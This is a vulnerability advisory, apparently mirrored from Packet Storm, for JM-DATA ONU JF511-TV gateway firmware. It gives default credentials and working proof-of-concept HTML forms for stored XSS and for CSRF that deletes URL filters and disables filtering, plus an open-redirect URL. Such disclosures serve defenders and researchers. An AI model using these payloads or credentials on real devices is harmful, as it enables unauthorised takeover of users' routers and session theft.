what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect
Posted Jun 19, 2022
Authored by Neurogenesia | Site zeroscience.mk

JM-DATA ONU JF511-TV versions 1.0.67, 1.0.62, and 1.0.55 suffer from cross site request forgery, persistent cross site scripting, default credential, and open redirection vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | c51066c0cb9048b02b75497475a4a15013a17f7c6f79b27527c10c72ae1fc0c9

JM-DATA ONU JF511-TV 1.0.67 / 1.0.62 / 1.0.55 XSS / CSRF / Open Redirect

Change Mirror Download

JM-DATA ONU JF511-TV Multiple Remote Vulnerabilities


Vendor: JM-DATA GmbH
Product web page: https://www.jm-data.at
Affected version: 1.0.67
1.0.62
1.0.55

Summary: This ONU is the perfect GEPON home and business gateway.
It is an all-rounder in perfection. It can BRIDGE/NAT/RIP ROUTEND
and COMBINED.

Desc: The device suffers from multiple vulnerabilities including:
Default Credentials, CSRF, Authenticated Stored XSS and Open Redirect.

Tested on: Boa/0.93.15


Vulnerability discovered by Neurogenesia
@zeroscience


Advisory ID: ZSL-2022-5708
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5708.php


24.04.2022

--


Default credentials:
--------------------
user:user


Stored XSS / HTML Injection:
----------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="url" value="'><script>alert(document.cookie)</script>' />
<input type="hidden" name="action" value="ad" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>


CSRF (delete IP entry filter):
------------------------------
<html>
<body>
<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="bcdata" value="ld3:idxi0eee" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="submit-url" value="/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>

<form action="https://192.168.1.2:8443/boaform/admin/formURL" method="POST">
<input type="hidden" name="urlfilterEnble" value="off" />
<input type="hidden" name="action" value="rm" />
<input type="hidden" name="bcdata" value="ld3:idxi0eed3:idxi1eee" />
<input type="hidden" name="submit-url" value="https://192.168.1.2:8443/secu_urlfilter_cfg_en.asp" />
<input type="submit" value="Go" />
</form>
</body>
</html>


Open Redirect:
--------------
https://192.168.1.2:8443/boaform/formWirelessTbl?submit-url=https://zeroscience.mk


common.js:
----------
/*
* isCharUnsafe - test a character whether is unsafe
* @c: character to test
*/
function isCharUnsafe(c)
{
var unsafeString = "\"\\`\+\,='\t";

return unsafeString.indexOf(c) != -1
|| c.charCodeAt(0) <= 32
|| c.charCodeAt(0) >= 123;
}

/*
* isIncludeInvalidChar - test a string whether includes invalid characters
* @s: string to test
*/
function isIncludeInvalidChar(s)
{
var i;

for (i = 0; i < s.length; i++) {
if (isCharUnsafe(s.charAt(i)) == true)
return true;
}

return false;
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close